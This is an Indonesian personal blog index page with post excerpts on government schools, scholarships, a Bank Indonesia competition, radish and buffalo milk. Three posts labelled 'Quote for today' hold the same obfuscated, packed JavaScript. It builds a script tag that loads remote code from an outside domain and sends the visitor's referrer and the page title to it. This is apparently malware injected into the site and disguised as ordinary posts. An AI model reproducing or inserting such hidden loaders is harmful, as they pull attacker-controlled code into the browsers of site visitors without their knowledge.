browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Umum

Sekolah Kedinasan Pemerintah II

Postingan ini merupakan lanjutan ini. Kalau ada beberapa institusi yang sama dengan postingan sebelumnya, dimaklumin ya… ini males ngedit tralala, soalnya lagi diuber deadline nggarap makalah Prajab dan ngelarin tugas negara juga. Sekalian mohon doa yaaa… semoga aku/saya/diriku/penulis/kami/dll sebutan lainnya, dimudahkan dan dilancarkan daaaaannnnnn….. lulus prajab pastinya. Aamiinnn …. Aamiiiiinnnn ….. Ya Robbal Alamiiinnnn …. … Continue reading »

Categories: Info Kampus, SCHOLARSHIP, Umum | Leave a comment

Quote for today

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Categories: Motivasi - Inspirasi, Umum | Leave a comment

Beasiswa DataPrint 2014

Ayo dapatkan beasiswa DataPrint untuk 700 orang senilai ratusan juta rupiah. Persyaratan Umum: Pelajar/mahasiswa aktif dari tingkat SMP hingga perguruan tinggi untuk jenjang D3/S1 Terlibat aktif di kegiatan atau organisasi sekolah/perguruan tinggi Tidak terlibat narkoba atau pernah melakukan tindak kriminal Tidak sedang menerima beasiswa dari perusahaan lain. Jika saat ini peserta masih menerima beasiswa dari … Continue reading »

Categories: SCHOLARSHIP, Umum | 2 Comments

Tentang Lobak

Ceritanya nih, kan ditugasi jadi perwakilan Dharma Wanita untuk mengikuti pelatihan mengukir buah, nah salah satu bahan yang harus dibawa itu Lobak. Bingung dah harus nyari dimana, lha wong bentuknya aja masih nggak ngerti. Benernya sering denger sih nama sayuran ini disebut, tapi megang langsung jujur aja belum pernah. Jadilah browsing kemana mana tentang per-Lobak-an … Continue reading »

Categories: Info Pangan & Gizi, Umum | 2 Comments

Lomba Karya Ilmiah Bank Indonesia Campus Knowledge Competition (BI-CKC) 2014

Bank Indonesia menggelar lomba karya ilmiah berjudul Bank Indonesia Campus Knowledge Competition (BI-CKC) 2014 bagi kalangan akademisi dengan tema “Implementasi Visi dan Nilai Strategis Bank Indonesia pasca OJK”. Bank Indonesia menyediakan total hadiah sebesar Rp75.000.000,- (tujuh puluh lima juta rupiah). Lomba ini terbuka bagi dosen maupun mahasiswa dari perguruan tinggi di seluruh Indonesia baik perorangan … Continue reading »

Categories: Info Kampus, Umum | Leave a comment

Quote for today

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Categories: Motivasi - Inspirasi, Umum | 1 Comment

Susu Kerbau nan Lezatto

Selain susu sapi dan susu kambing, ternyata ada susu lain yang tidak kalah bergizinya lho.  Ada susu unta, susu domba, susu kuda juga susu kerbau. Susu kerbau mudah dikenali dari warnanya yang putih bersih. Bahkan, lebih putih dari susu sapi. Warna putih ini disebabkan oleh sedikitnya kandungan pigmen karoten kuning yang biasanya merupakan tanda adanya … Continue reading »

Categories: Info Pangan & Gizi, Umum | Leave a comment

BEASISWA AAS 2014 (01 FEB – 18 JULI 2014)

Lulusan S1 yang pengen kuliah di aussie? Atau PNS yang juga lagi nyari info beasiswa? PNS disini untuk berbagai bidang lho, bukan hanya dosen.  Australian Awards Scholarship (AAS) sudah dibuka lho, simak infonya yuk. AAS atau Australia Awards Scholarship yang diberikan oleh pemerintah Australia dan dikelola oleh Departemen Luar Negeri dan Perdagangan Australia (DFAT). Beasiswa … Continue reading »

Categories: Info Kampus, SCHOLARSHIP, Umum | Leave a comment

Quote for today

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Categories: Motivasi - Inspirasi, Umum | Leave a comment